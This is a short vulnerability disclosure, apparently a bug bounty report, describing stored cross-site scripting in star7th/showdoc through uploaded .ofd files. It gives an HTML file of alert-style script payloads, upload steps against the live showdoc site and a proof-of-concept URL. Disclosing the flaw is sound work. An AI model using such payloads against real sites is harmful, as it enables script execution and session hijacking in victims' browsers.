Stored XSS viva .ofd file upload in star7th/showdoc
Reported on
Mar 14th 2022
Description
The application allows .ofd files to upload which lead to stored XSS
Proof of Concept
1.First, open your text file/notepad and paste the below payload and save it as XSS.ofd:
<html>
<script>alert(1337)</script>
<script>alert(document.domain)</script>
<script>alert(document.location)</script>
<script>alert('XSS_by_Samprit Das')</script>
</html>
2.Then go to https://www.showdoc.com.cn/ and login with your account.
3.After that navigate to file library (https://www.showdoc.com.cn/attachment/index)
4.In the File Library page, click the Upload button and choose the XSS.ofd
5.After uploading the file, click on the check button to open that file in a new tab.
PoC URL
https://img.showdoc.cc/622f4ea61d2fb_622f4ea61d2f4.ofd?e=1647271907&token=-YdeH6WvESHZKz-yUzWjO-uVV6A7oVrCN3UXi48F:bbO2sz89funrcJ7LgDhicc_W7YI=
Impact
This allows attackers to execute malicious scripts in the user's browser and it can lead to session hijacking, sensitive data exposure, and worse.